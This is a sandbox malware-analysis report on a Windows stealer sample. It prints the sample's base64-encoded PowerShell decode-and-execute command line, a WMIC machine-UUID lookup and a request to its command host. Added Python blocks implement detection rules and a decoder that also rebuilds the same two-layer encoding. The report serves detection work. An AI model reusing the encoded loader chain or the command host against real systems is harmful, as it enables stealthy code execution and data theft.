
Windows Analysis Report
dGhlYXB0Z3JvdXA=-free.exe

Overview

General Information

Sample name: dGhlYXB0Z3JvdXA=-free.exe
Analysis ID: 1583221
MD5: ede0a1c97eaa446541dcfccd6fa9a6a7
SHA1: e578715a247461d460899af7302152c5daf4365e
SHA256: 5a94644716cf1ab8c197ecad93562924c3bfb36224b8c0b68e26a252f3e713d8
Tags: EsqueleStealer, exe, FUD, user-aniko

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Powershell decode and execute
Encrypted powershell cmdline option found
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious PowerShell Parameter Substring
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • dGhlYXB0Z3JvdXA=-free.exe (PID: 6004 cmdline: "C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe" MD5: EDE0A1C97EAA446541DCFCCD6FA9A6A7)
    • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 5308 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 4072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD9CB.tmp" "c:\Users\user\AppData\Local\Temp\at4aznwk\CSC4E83F948CA91455DAC7F3163ADDBB8D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
      • csc.exe (PID: 5592 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 1408 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE63E.tmp" "c:\Users\user\AppData\Local\Temp\f2b3v2t5\CSCCC5958D27FB74F62AE119AE083742021.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • WMIC.exe (PID: 4676 cmdline: "wmic" csproduct get uuid /value MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • cleanup
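The tree above is the evidence behind the Sigma hits listed later in the report: an encoded PowerShell command, csc.exe compiling a file out of a per-user Temp directory with powershell.exe as its parent, and a WMIC machine-UUID lookup. As an added example, not part of the Joe Sandbox report and not the Sigma rules' own selectors, the following Python restates those four checks and runs them over constructed process-creation events modelled on the tree. The PIDs, images and command lines are the ones shown above; the -Encoded argument is the leading part of the one recorded in the Sigma section, while the WMIC image path, the benign MSBuild control event and the rule names are assumptions.

```python
"""Sigma-style process-creation checks modelled on the process tree in this report."""
import re
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple


@dataclass
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


# -EncodedCommand may be abbreviated to any unambiguous prefix; these are the
# common spellings. The argument must look like a long base64 blob.
_ENC_FLAG = re.compile(r"\s-e(?:c|n|nc|ncoded(?:command)?)?\s+[A-Za-z0-9+/]{40,}={0,2}", re.I)
_SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")
_USER_WRITABLE = re.compile(r"\\(?:appdata\\local\\temp|users\\public|programdata)\\", re.I)


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def powershell_encoded_command(e: ProcEvent) -> bool:
    """Cf. Sigma 'Suspicious Execution of Powershell with Base64'."""
    return _basename(e.image) in ("powershell.exe", "pwsh.exe") and bool(_ENC_FLAG.search(e.cmdline))


def csc_compiles_from_user_writable_dir(e: ProcEvent) -> bool:
    """Cf. Sigma 'Dot net compiler compiles file from suspicious location'."""
    return _basename(e.image) in ("csc.exe", "vbc.exe") and bool(_USER_WRITABLE.search(e.cmdline))


def csc_spawned_by_script_host(e: ProcEvent) -> bool:
    """Cf. Sigma 'Dynamic .NET Compilation Via Csc.EXE' (Add-Type compiled at runtime)."""
    return _basename(e.image) == "csc.exe" and _basename(e.parent_image) in _SCRIPT_HOSTS


def wmic_csproduct_uuid(e: ProcEvent) -> bool:
    """Machine-UUID lookup via WMI, used both as a victim identifier and for VM detection."""
    return _basename(e.image) == "wmic.exe" and re.search(r"csproduct\s+get\s+uuid", e.cmdline, re.I) is not None


RULES: Dict[str, Callable[[ProcEvent], bool]] = {
    "powershell_encoded_command": powershell_encoded_command,
    "csc_compiles_from_user_writable_dir": csc_compiles_from_user_writable_dir,
    "csc_spawned_by_script_host": csc_spawned_by_script_host,
    "wmic_csproduct_uuid": wmic_csproduct_uuid,
}


def run_rules(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    """Return (rule, pid) for every event each rule matches, in event order."""
    return [(name, e.pid) for e in events for name, rule in RULES.items() if rule(e)]


# Constructed events. PIDs, images and command lines follow the tree above; the
# -Encoded argument is the leading part of the one shown in the Sigma matches,
# the WMIC image path is assumed, and the MSBuild-driven csc.exe is an invented
# benign control that must not fire.
EVENTS = [
    ProcEvent(5652, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded '
              "WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoA",
              r"C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe"),
    ProcEvent(5308, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline"',
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcEvent(4676, r"C:\Windows\System32\wbem\WMIC.exe",
              '"wmic" csproduct get uuid /value',
              r"C:\Users\user\Desktop\dGhlYXB0Z3JvdXA=-free.exe"),
    ProcEvent(9001, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig '
              r'@"C:\src\app\obj\Debug\app.cmdline"',
              r"C:\Program Files\Microsoft Visual Studio\MSBuild\Current\Bin\MSBuild.exe"),
]

if __name__ == "__main__":
    for hit in run_rules(EVENTS):
        print(hit)
```

The parent-image check is what separates the malicious csc.exe from ordinary build activity: the control event compiles from a project directory under MSBuild and matches nothing, while PID 5308 fires twice, once for the Temp path and once for its powershell.exe parent.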
No configs have been found
Source: Process Memory Space: powershell.exe PID: 5652
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0xbca8c:$b2: ::FromBase64String(
  • 0xbca6b:$b3: ::UTF8.GetString(
  • 0x4074d:$s1: -join
  • 0x40788:$s1: -join
  • 0x40842:$s1: -join
  • 0x40870:$s1: -join
  • 0x40a15:$s1: -join
  • 0x40a38:$s1: -join
  • 0x40cec:$s1: -join
  • 0x40d0d:$s1: -join
  • 0x40d3f:$s1: -join
  • 0x40d87:$s1: -join
  • 0x40db4:$s1: -join
  • 0x40ddb:$s1: -join
  • 0x40e0c:$s1: -join
  • 0x40e2e:$s1: -join
  • 0x40e9d:$s1: -join
  • 0x41323:$s1: -join
  • 0x41345:$s1: -join
  • 0x4139d:$s1: -join
  • 0x413c7:$s1: -join
Source: Process Memory Space: powershell.exe PID: 764
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x116d3d:$b2: ::FromBase64String(
  • 0x116d1c:$b3: ::UTF8.GetString(
  • 0x656b6:$s1: -join
  • 0x672b7:$s1: -join
  • 0x67443:$s1: -join
  • 0x6b8f2:$s1: -join
  • 0xdbeaf:$s1: -join
  • 0xdbeea:$s1: -join
  • 0xdbfa4:$s1: -join
  • 0xdbfd2:$s1: -join
  • 0xdc177:$s1: -join
  • 0xdc19a:$s1: -join
  • 0xdc44e:$s1: -join
  • 0xdc46f:$s1: -join
  • 0xdc4a1:$s1: -join
  • 0xdc4e9:$s1: -join
  • 0xdc516:$s1: -join
  • 0xdc53d:$s1: -join
  • 0xdc56e:$s1: -join
  • 0xdc590:$s1: -join
  • 0xdc5ff:$s1: -join
Source: amsi64_5652.amsi.csv
Rule: JoeSecurity_PowershellDecodeAndExecute
Description: Yara detected Powershell decode and execute
Author: Joe Security

Source: amsi64_764.amsi.csv
Rule: JoeSecurity_PowershellDecodeAndExecute
Description: Yara detected Powershell decode and execute
Author: Joe Security

      System Summary

      Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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
      Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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
      Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAYQBXAFkAZwBLAEMAMQB1AGIAMwBRAGcASwBGAHQAVABlAFgATgAwAFoAVwAwAHUAVABXAEYAdQBZAFcAZABsAGIAVwBWAHUAZABDADUAQgBkAFgAUgB2AGIAVwBGADAAYQBXADkAdQBMAGwAQgBUAFYASABsAHcAWgBVADUAaABiAFcAVgBkAEoAMQBkAHAAYgBqAE0AeQBKAHkAawB1AFYASABsAHcAWgBTAGsAZwBlAHcAMABLAEkAQwBBAGcASQBFAEYAawBaAEMAMQBVAGUAWABCAGwASQBFAEEAaQBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABPAHcAMABLAEkAQwBBAGcASQBIAFYAegBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAGQAVwA1ADAAYQBXADEAbABMAGsAbAB1AGQARwBWAHkAYgAzAEIAVABaAFgASgAyAGEAVwBOAGwAYwB6AHMATgBDAGcAMABLAEkAQwBBAGcASQBIAEIAMQBZAG0AeABwAFkAeQBCAGoAYgBHAEYAegBjAHkAQgBYAGEAVwA0AHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFMAVwA1ADAAVQBIAFIAeQBJAEUAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAVABzAE4AQwBnADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAYgBSAEcAeABzAFMAVwAxAHcAYgAzAEoAMABLAEMASgAxAGMAMgBWAHkATQB6AEkAdQBaAEcAeABzAEkAaQBsAGQARABRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBGAHQAeQBaAFgAUgAxAGMAbQA0ADYASQBFADEAaABjAG4ATgBvAFkAVwB4AEIAYwB5AGgAVgBiAG0AMQBoAGIAbQBGAG4AWgBXAFIAVQBlAFgAQgBsAEwAawBKAHYAYgAyAHcAcABYAFEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB3AGQAVwBKAHMAYQBXAE0AZwBjADMAUgBoAGQARwBsAGoASQBHAFYANABkAEcAVgB5AGIAaQBCAGkAYgAyADkAcwBJAEYATgBvAGIAMwBkAFgAYQBXADUAawBiADMAYwBvAFMAVwA1ADAAVQBIAFIAeQBJAEcAaABYAGIAbQBRAHMASQBHAGwAdQBkAEMAQgB1AFEAMgAxAGsAVQAyAGgAdgBkAHkAawA3AEQAUQBvAGcASQBDAEEAZwBmAFEAMABLAEkAawBBAE4AQwBuADAATgBDAG0AWgAxAGIAbQBOADAAYQBXADkAdQBJAEUAZABsAGQARQBGAGoAZABHA
GwAMgBaAFYAZABwAGIAbQBSAHYAZAAxAFIAcABkAEcAeABsAEsAQwBrAGcAZQB3ADAASwBJAEMAQQBnAEkAQwBSAG8AVgAyADUAawBJAEQAMABnAFcAMQBkAHAAYgBqAE0AeQBYAFQAbwA2AFIAMgBWADAAUgBtADkAeQBaAFcAZAB5AGIAMwBWAHUAWgBGAGQAcABiAG0AUgB2AGQAeQBnAHAARABRAG8AZwBJAEMAQQBnAEoASABOAGkASQBEADAAZwBUAG0AVgAzAEwAVQA5AGkAYQBtAFYAagBkAEMAQgBUAGUAWABOADAAWgBXADAAdQBWAEcAVgA0AGQAQwA1AFQAZABIAEoAcABiAG0AZABDAGQAVwBsAHMAWgBHAFYAeQBLAEQASQAxAE4AaQBrAE4AQwBpAEEAZwBJAEMAQgBiAFYAMgBsAHUATQB6AEoAZABPAGoAcABIAFoAWABSAFgAYQBXADUAawBiADMAZABVAFoAWABoADAASwBDAFIAbwBWADIANQBrAEwAQwBBAGsAYwAyAEkAcwBJAEMAUgB6AFkAaQA1AEQAWQBYAEIAaABZADIAbAAwAGUAUwBrAGcAZgBDAEIAUABkAFgAUQB0AFQAbgBWAHMAYgBBADAASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQQBrAGMAMgBJAHUAVgBHADkAVABkAEgASgBwAGIAbQBjAG8ASwBRADAASwBmAFEAMABLAFoAbgBWAHUAWQAzAFIAcABiADIANABnAFMARwBsAGsAWgBVAEYAagBkAEcAbAAyAFoAVgBkAHAAYgBtAFIAdgBkAHkAZwBwAEkASABzAE4AQwBpAEEAZwBJAEMAQQBrAGEARgBkAHUAWgBDAEEAOQBJAEYAdABYAGEAVwA0AHoATQBsADAANgBPAGsAZABsAGQARQBaAHYAYwBtAFYAbgBjAG0AOQAxAGIAbQBSAFgAYQBXADUAawBiADMAYwBvAEsAUQAwAEsASQBDAEEAZwBJAEYAdABYAGEAVwA0
      Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5652, TargetFilename: C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline
      Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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
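      The -Encoded argument behind the matches above is a two-layer encoding: powershell.exe's -Encoded switch takes base64 of UTF-16LE text, and that text in turn calls [System.Convert]::FromBase64String on the "Script" member of a JSON object and passes the result through UTF8.GetString. Decoding the part of the argument that is visible on the page shows the inner script opening with an Add-Type block that P/Invokes user32.dll (GetForegroundWindow, ShowWindow); compiling that block is what spawns csc.exe and cvtres.exe under each powershell.exe. The Python below is an added example, not code from the report or from the sample, that peels both layers. It embeds only the first 232 characters of the report's argument (the page truncates the rest) and otherwise works on a constructed sample script; the PowerShell text after the JSON member in encode_like_sample is an assumption, since the page does not show it.

```python
"""Decode the nested -Encoded payload carried by the report's PowerShell command lines."""
import base64
import re
from typing import Optional

# First 232 characters of the powershell.exe -Encoded argument shown in the Sigma
# match above (the page truncates the argument, so only this prefix is reproduced).
REPORT_ENCODED_PREFIX = (
    "WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoA"
    "VQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMA"
    "bwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4A"
    "ZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIA"
)

# Markers worth flagging in the decoded script; each maps to a behaviour the
# report lists (Add-Type is what makes csc.exe/cvtres.exe appear under powershell.exe).
MARKERS = {
    "Add-Type": "runtime C# compilation via csc.exe",
    "DllImport": "P/Invoke into a native DLL",
    "FromBase64String": "another base64 layer to peel",
    "GetForegroundWindow": "console/window manipulation",
}

_SCRIPT_MEMBER = re.compile(r'"Script"\s*:\s*"([A-Za-z0-9+/=]+)')


def _repair_b64(s: str) -> str:
    """Strip non-alphabet noise and fix padding so truncated captures still decode."""
    s = re.sub(r"[^A-Za-z0-9+/]", "", s)
    if len(s) % 4 == 1:          # a lone trailing character can never encode a byte
        s = s[:-1]
    return s + "=" * (-len(s) % 4)


def decode_encoded_command(arg: str) -> str:
    """Layer 1: -Encoded/-EncodedCommand is base64 over the UTF-16LE script text."""
    raw = base64.b64decode(_repair_b64(arg))
    raw = raw[: len(raw) - len(raw) % 2]   # drop a dangling odd byte left by truncation
    return raw.decode("utf-16-le", errors="replace")


def extract_inner_script(outer: str) -> Optional[str]:
    """Layer 2: the outer command embeds '{"Script":"<base64>"}' and runs the member
    through FromBase64String/UTF8.GetString; pull that member out and decode it."""
    m = _SCRIPT_MEMBER.search(outer)
    if m is None:
        return None
    return base64.b64decode(_repair_b64(m.group(1))).decode("utf-8", errors="replace")


def triage(arg: str) -> dict:
    """Peel both layers and report which MARKERS the innermost text contains."""
    outer = decode_encoded_command(arg)
    inner = extract_inner_script(outer)
    text = inner if inner is not None else outer
    return {"outer": outer, "inner": inner,
            "markers": [m for m in MARKERS if m in text]}


def encode_like_sample(script: str) -> str:
    """Constructed helper for offline testing: wraps a script in the same two layers.
    The text after the JSON member (closing the single-quoted string and reading
    .Script) is not visible on the page and is an assumption."""
    inner = base64.b64encode(script.encode("utf-8")).decode("ascii")
    outer = ("[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(("
             "'{\"Script\":\"" + inner + "\"}' | ConvertFrom-Json).Script))")
    return base64.b64encode(outer.encode("utf-16-le")).decode("ascii")


# Constructed stand-in for the inner script: it mirrors the opening of what the
# report's full argument decodes to (an Add-Type block importing user32.dll).
SAMPLE_SCRIPT = (
    "if (-not ([System.Management.Automation.PSTypeName]'Win32').Type) {\r\n"
    '    Add-Type @"\r\n'
    "    using System;\r\n"
    "    using System.Runtime.InteropServices;\r\n"
    "    public class Win32 {\r\n"
    '        [DllImport("user32.dll")]\r\n'
    "        public static extern IntPtr GetForegroundWindow();\r\n"
    "    }\r\n"
    '"@\r\n'
    "}\r\n"
)

if __name__ == "__main__":
    print(decode_encoded_command(REPORT_ENCODED_PREFIX))
    result = triage(encode_like_sample(SAMPLE_SCRIPT))
    print(result["inner"])
    print(result["markers"])
```

      Padding repair matters in practice: command lines captured by EDR or Sysmon are routinely cut at a fixed length, and without it the outer layer of exactly this kind of argument fails to decode at all.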

      Data Obfuscation

      Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Encoded 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
      No Suricata rule has matched

      Source: dGhlYXB0Z3JvdXA=-free.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.pdbhP source: powershell.exe, 00000007.00000002.2268510659.000001C3815D6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: D:\a\deno\deno\target\release\deps\deno.pdb source: dGhlYXB0Z3JvdXA=-free.exe, 00000000.00000000.2046501543.00007FF6773EE000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: *on.pdb; source: powershell.exe, 00000003.00000002.2264583068.00000254D0FFE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb28 source: powershell.exe, 00000003.00000002.2264583068.00000254D0FD4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbT source: powershell.exe, 00000003.00000002.2265232590.00000254D12FF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb9 source: powershell.exe, 00000003.00000002.2265232590.00000254D12D0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb source: powershell.exe, 00000003.00000002.2264583068.00000254D0FD4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2327769536.000001C3F3122000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbt source: powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\f2b3v2t5\f2b3v2t5.pdb source: powershell.exe, 00000007.00000002.2268510659.000001C3815D6000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.pdb source: powershell.exe, 00000003.00000002.2234723049.00000254BA357000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: tion.pdb source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2265232590.00000254D12FF000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ystem.Core.pdb.# source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb' source: powershell.exe, 00000007.00000002.2328766048.000001C3F3380000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 8C:\Users\user\AppData\Local\Temp\at4aznwk\at4aznwk.pdbhP source: powershell.exe, 00000003.00000002.2234723049.00000254BA357000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000007.00000002.2327416942.000001C3F30DE000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: re.pdb source: powershell.exe, 00000003.00000002.2263615074.00000254D0F65000.00000004.00000020.00020000.00000000.sdmp
      Source: global traffic; TCP traffic: 192.168.2.5:49208 -> 1.1.1.1:53
      Source: Joe Sandbox View; IP Address: 188.114.97.3
      Source: Joe Sandbox View; IP Address: 185.199.110.133
      Source: unknown; TCP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
      Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (2 occurrences)
      Source: global traffic; HTTP traffic detected:
      GET /api/get/free HTTP/1.1
      accept: */*
      user-agent: Deno/1.6.3
      accept-encoding: gzip, br
      host: skeletonwatcher.rest
      Source: global traffic; DNS traffic detected: DNS query: raw.githubusercontent.com
      Source: global traffic; DNS traffic detected: DNS query: skeletonwatcher.rest
      Source: global traffic; HTTP traffic detected:
      HTTP/1.1 403 Forbidden
      Date: Thu, 02 Jan 2025 07:59:37 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Frame-Options: SAMEORIGIN
      Referrer-Policy: same-origin
      Cache-Control: max-age=15
      Expires: Thu, 02 Jan 2025 07:59:52 GMT
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WxwCcR3duDu6tb7BHuiskrOr339PyGUN5chm%2Fr8RL3EUM23nSHRZRAzoEk4JRIDG%2F1%2B62bbxsxFFFK9ZT8Hk0AP4%2FTJVzQORMNfQmdXDM2yle%2FY39nglQByKRxzQcjnu1x4Al2t25Q%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Vary: Accept-Encoding
      Server: cloudflare
      CF-RAY: 8fb935f5dce7f795-EWR
      Content-Encoding: gzip
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=1402&min_rtt=1402&rtt_var=701&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=122&delivery_rate=0&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
      Data Raw: 36 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f dc b8 11 fe be bf 62 ac 02 f6 2e b0 94 ec bc 5c 1c 5b ab e2 9a b8 80 81 14 97 5e 1c b4 c1 21 30 28 72 b4 e2 99 22 55 92 5a 79 e1 fa bf 17 14 a5 b5 f6 c5 be 06 2d 60 c0 a2 38 7c 66 f8 cc 33 23 72 d3 a3 8f bf 7c b8 f9 f6 f9 0a 4a 57 c9 6c 92 1e 11 f2 9b 28 40 3a b8 be 82 77 df 33 48 fd 04 30 49 ad 5d 44 4a 93 df 2d 08 fc 09 b4 e4 02 23 90 54 2d 17 11 2a f2 f5 4b 94 41 7a f4 1b 2a 2e 8a ef 84 3c 41 f5 38 00 87 a1 de fd 18 d4 f9 0b 50 e7 3f 00 b5 74 3d 9a 7f 71 68 97 fb 28 84 6c 23 95 48 79 36 49 9d 70 12 b3 9f 9d 43 e5 84 56 f0 2b fe ab 11 06 f9 11 fc 1b 3e 48 dd f0 42 52 83 69 12 ec 26 69 85 8e 02 2b a9 b1 e8 16 d1 d7 9b bf 92 f3 08 92 61 a2 74 ae 26 1e 61 b5 88 3e 68 e5 41 c9 cd ba c6 08 58 18 2d 22 87 f7 2e f1 f1 5e 6e 60 5e 42 f9 27 f9 fa 33 f9 a0 ab 9a 3a 91 cb 31 d0 f5 d5 e2 8a 2f 71 b4 4e
